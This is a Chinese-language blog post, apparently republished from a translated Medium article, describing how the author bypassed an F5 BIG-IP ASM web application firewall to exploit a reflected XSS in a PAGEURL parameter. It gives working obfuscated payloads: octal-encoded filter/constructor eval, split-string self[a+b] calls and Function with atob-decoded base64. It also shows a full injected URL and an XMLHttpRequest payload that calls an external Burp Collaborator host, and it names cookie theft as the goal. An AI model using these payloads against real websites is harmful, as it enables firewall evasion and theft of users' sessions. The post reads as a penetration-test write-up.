绕 waf 实战之 xss 漏洞利用
2022-7-5 17:39:29 Author: mp.weixin.qq.com(查看原文) 阅读量:26 收藏

文章来源

https://shellbr3ak.medium.com/xss-waf-bypass-128e8b4167fb

在一次测试中,遇到一个可以利用 XSS 的点,但是存在 BIG-IP ASM 防火墙,导致无法直接利用,在大神的帮助下完成了利用。随后经过自己的努力,也找到了一种绕过方式。

0x01 XSS 漏洞发现

测试中发现一个接口,参数 PAGEURL 可控,且输入的内容会原样响应在返回包中,如图:

响应包如图:

测试常规 payload 被 WAF 拦截,如图:

响应包:

可以看到被 WAF 拦截。

0x02 WAF 绕过

在这个点上测试了一天都没能绕过,在以为专注 WAF 绕过研究的大神帮助下,发现一个可用的 Payload,长下面的样子:

[]["\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162"]("\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()

老实说,长这个样子的 payload 我也是第一次见,解码后的内容是:

[]["filter"]["constructor"]("alert(1)")()

接下来使用这个 payload 进行测试,如图

响应如图:

可以看到 payload 都已经出现在响应包里,但是是否可以执行呢?使用浏览器打开这个 URL:

https://subdomain.redacted.com/...?PAGEURL=/something/";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="

发现代码已经执行了,说明 payload 有效。

漏洞利用

当然,我们并不会满足于只是弹窗,接下来如何利用这个漏洞才是重点,首先基于 payload 的生成规则,编写了一个 Python 脚本,方便构造不同的 payload:

脚本使用方法,输入想要注入的 payload 即可:

XSS 通常用来盗取 cookie,接下来我尝试使用 XMLHttpRequest API 结合 burp 来进行漏洞利用的验证,将下面的 payload 进行转换:

var req = new XMLHttpRequest(); req.open(“GET”, “https://s2v3f4nqrlg0kl5f2a0zggd37udl1a.burpcollaborator.net/xss",true); req.send(null);

然后将 payload 与 url 进行组合然后请求,查看 burp 的访问记录:

说明 payload 执行成功。

自我突破,新姿势

之前的 payload 是大佬给的,能不能自己实现一个绕过呢?看了一些 waf 绕过的资料后,发现以下 payload 可用:

a=”al”;b=”ert”;self[a+b]();

尝试是否可以绕过:

响应:

发现 waf 并没有拦截,尝试用浏览器打开页面,成功弹窗:

当然,利用 xss 不仅仅是弹窗,还是需要执行更复杂的功能,我们可以使用 Function 函数,构造的 payload 如下:

a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)();

请求之后的返回结果:

浏览器访问之后执行 payload:

接下来想要执行更复杂的 payload,只需要修改 base64 编码部分即可,所以编写了如下脚本:

比如之前提到的利用 burp 验证:

提交之后返回结果如图:

浏览器访问之后,在 burp 得到如下结果:

值得注意的是,self[""] 被拦截,但是 self[a+b] 没有。

总结

以上是这次针对存在 waf 的 xss 漏洞接口的绕过测试过程,通过一些 JavaScript 的特性,通过字符串变化、编码等方式组合 payload 从而实现 waf 的绕过,waf 通常是通过正则来进行检测和拦截,如果你找到了目标 waf 规则之外的方式,那么,恭喜你,waf 对你无用。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247497699&idx=1&sn=4f44ea3f0560dbbd38721b6fb7c414a0&chksm=ec1dc7cbdb6a4edd54d3717160018471f847c600fae5ede140c399792cda1f041bcb6c8e66fe#rd
如有侵权请联系:admin#unsafe.sh